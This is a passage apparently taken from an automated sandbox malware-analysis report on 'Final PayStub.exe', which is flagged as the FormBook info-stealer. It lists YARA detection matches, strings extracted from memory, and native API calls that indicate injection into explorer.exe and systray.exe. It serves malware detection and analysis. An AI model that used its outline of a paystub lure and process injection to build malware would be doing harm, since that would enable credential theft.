Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000007.00000000.1260065086.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2479702809.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comP;
Source: explorer.exe, 00000007.00000000.1260065086.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2479702809.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000000.1249592340.00000000071CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/A
Source: explorer.exe, 00000007.00000000.1260065086.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2479702809.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comZ
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.Final PayStub.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Final PayStub.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.Final PayStub.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.Final PayStub.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Final PayStub.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Final PayStub.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.Final PayStub.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Final PayStub.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Final PayStub.exe PID: 6720, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: Final PayStub.exe PID: 7004, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: systray.exe PID: 6752, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041A330 NtCreateFile,	6_2_0041A330
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041A3E0 NtReadFile,	6_2_0041A3E0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041A460 NtClose,	6_2_0041A460
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041A510 NtAllocateVirtualMemory,	6_2_0041A510
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041A3DA NtReadFile,	6_2_0041A3DA
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041A45A NtClose,	6_2_0041A45A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041A50A NtAllocateVirtualMemory,	6_2_0041A50A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041A58A NtAllocateVirtualMemory,	6_2_0041A58A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2B60 NtClose,LdrInitializeThunk,	6_2_013C2B60
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_013C2BF0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2AD0 NtReadFile,LdrInitializeThunk,	6_2_013C2AD0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_013C2D30
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_013C2D10
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_013C2DF0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_013C2DD0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_013C2C70
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_013C2CA0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2F30 NtCreateSection,LdrInitializeThunk,	6_2_013C2F30
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2FB0 NtResumeThread,LdrInitializeThunk,	6_2_013C2FB0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2F90 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_013C2F90
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2FE0 NtCreateFile,LdrInitializeThunk,	6_2_013C2FE0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_013C2EA0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_013C2E80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C4340 NtSetContextThread,	6_2_013C4340
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C4650 NtSuspendThread,	6_2_013C4650
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2BA0 NtEnumerateValueKey,	6_2_013C2BA0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2B80 NtQueryInformationFile,	6_2_013C2B80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2BE0 NtQueryValueKey,	6_2_013C2BE0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2AB0 NtWaitForSingleObject,	6_2_013C2AB0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2AF0 NtWriteFile,	6_2_013C2AF0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2D00 NtSetInformationFile,	6_2_013C2D00
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2DB0 NtEnumerateKey,	6_2_013C2DB0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2C00 NtQueryInformationProcess,	6_2_013C2C00
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2C60 NtCreateKey,	6_2_013C2C60
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2CF0 NtOpenProcess,	6_2_013C2CF0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2CC0 NtQueryVirtualMemory,	6_2_013C2CC0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2F60 NtCreateProcessEx,	6_2_013C2F60
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2FA0 NtQuerySection,	6_2_013C2FA0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2E30 NtWriteVirtualMemory,	6_2_013C2E30
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2EE0 NtQueueApcThread,	6_2_013C2EE0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C3010 NtOpenDirectoryObject,	6_2_013C3010
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C3090 NtSetValueKey,	6_2_013C3090
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C35C0 NtCreateMutant,	6_2_013C35C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C39B0 NtGetContextThread,	6_2_013C39B0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C3D10 NtOpenProcessToken,	6_2_013C3D10
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C3D70 NtOpenThread,	6_2_013C3D70
Source: C:\Windows\explorer.exe	Code function: 7_2_110AAE12 NtProtectVirtualMemory,	7_2_110AAE12
Source: C:\Windows\explorer.exe	Code function: 7_2_110A9232 NtCreateFile,	7_2_110A9232
Source: C:\Windows\explorer.exe	Code function: 7_2_110AAE0A NtProtectVirtualMemory,	7_2_110AAE0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF35C0 NtCreateMutant,LdrInitializeThunk,	13_2_04DF35C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_04DF2CA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_04DF2C70
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2C60 NtCreateKey,LdrInitializeThunk,	13_2_04DF2C60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2DD0 NtDelayExecution,LdrInitializeThunk,	13_2_04DF2DD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_04DF2DF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_04DF2D10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_04DF2EA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2FE0 NtCreateFile,LdrInitializeThunk,	13_2_04DF2FE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2F30 NtCreateSection,LdrInitializeThunk,	13_2_04DF2F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2AD0 NtReadFile,LdrInitializeThunk,	13_2_04DF2AD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_04DF2BF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2BE0 NtQueryValueKey,LdrInitializeThunk,	13_2_04DF2BE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2B60 NtClose,LdrInitializeThunk,	13_2_04DF2B60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF4650 NtSuspendThread,	13_2_04DF4650
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF3090 NtSetValueKey,	13_2_04DF3090
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF3010 NtOpenDirectoryObject,	13_2_04DF3010
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF4340 NtSetContextThread,	13_2_04DF4340
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2CC0 NtQueryVirtualMemory,	13_2_04DF2CC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2CF0 NtOpenProcess,	13_2_04DF2CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2C00 NtQueryInformationProcess,	13_2_04DF2C00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2DB0 NtEnumerateKey,	13_2_04DF2DB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF3D70 NtOpenThread,	13_2_04DF3D70
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF3D10 NtOpenProcessToken,	13_2_04DF3D10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2D00 NtSetInformationFile,	13_2_04DF2D00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2D30 NtUnmapViewOfSection,	13_2_04DF2D30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2EE0 NtQueueApcThread,	13_2_04DF2EE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2E80 NtReadVirtualMemory,	13_2_04DF2E80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2E30 NtWriteVirtualMemory,	13_2_04DF2E30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2F90 NtProtectVirtualMemory,	13_2_04DF2F90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2FB0 NtResumeThread,	13_2_04DF2FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2FA0 NtQuerySection,	13_2_04DF2FA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2F60 NtCreateProcessEx,	13_2_04DF2F60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF39B0 NtGetContextThread,	13_2_04DF39B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2AF0 NtWriteFile,	13_2_04DF2AF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2AB0 NtWaitForSingleObject,	13_2_04DF2AB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2B80 NtQueryInformationFile,	13_2_04DF2B80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF2BA0 NtEnumerateValueKey,	13_2_04DF2BA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBA3E0 NtReadFile,	13_2_02BBA3E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBA330 NtCreateFile,	13_2_02BBA330
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBA460 NtClose,	13_2_02BBA460
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBA510 NtAllocateVirtualMemory,	13_2_02BBA510
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBA3DA NtReadFile,	13_2_02BBA3DA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBA45A NtClose,	13_2_02BBA45A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBA58A NtAllocateVirtualMemory,	13_2_02BBA58A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBA50A NtAllocateVirtualMemory,	13_2_02BBA50A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BCA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	13_2_04BCA036
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BC9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	13_2_04BC9BAF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BCA042 NtQueryInformationProcess,	13_2_04BCA042
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BC9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_04BC9BB2

Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_00DB3E40	0_2_00DB3E40
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_00DBD6FC	0_2_00DBD6FC
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_04BB6B78	0_2_04BB6B78
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_04BB0130	0_2_04BB0130
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_04BB0120	0_2_04BB0120
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_04BB6B68	0_2_04BB6B68
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_068A7968	0_2_068A7968
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_068A1DB8	0_2_068A1DB8
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_068A1548	0_2_068A1548
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_068A3A47	0_2_068A3A47
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_068A3A58	0_2_068A3A58
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_068A3098	0_2_068A3098
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_068A30A8	0_2_068A30A8
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_068A1980	0_2_068A1980
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_085A2106	0_2_085A2106
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_085A34F8	0_2_085A34F8
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_085A2C38	0_2_085A2C38
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_085A5310	0_2_085A5310
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 0_2_085A34EF	0_2_085A34EF
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041E093	6_2_0041E093
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041DA07	6_2_0041DA07
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041C3B6	6_2_0041C3B6
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041E442	6_2_0041E442
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041DCA0	6_2_0041DCA0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_00409E5B	6_2_00409E5B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_00409E60	6_2_00409E60
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041D753	6_2_0041D753
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041E7FD	6_2_0041E7FD
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041E782	6_2_0041E782
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01418158	6_2_01418158
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380100	6_2_01380100
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142A118	6_2_0142A118
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014481CC	6_2_014481CC
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014441A2	6_2_014441A2
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014501AA	6_2_014501AA
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01422000	6_2_01422000
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144A352	6_2_0144A352
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014503E6	6_2_014503E6
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139E3F0	6_2_0139E3F0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014102C0	6_2_014102C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390535	6_2_01390535
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01450591	6_2_01450591
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01442446	6_2_01442446
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01434420	6_2_01434420
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0143E4F6	6_2_0143E4F6
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B4750	6_2_013B4750
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138C7C0	6_2_0138C7C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AC6E0	6_2_013AC6E0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A6962	6_2_013A6962
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0145A9A6	6_2_0145A9A6
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139A840	6_2_0139A840
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013768B8	6_2_013768B8
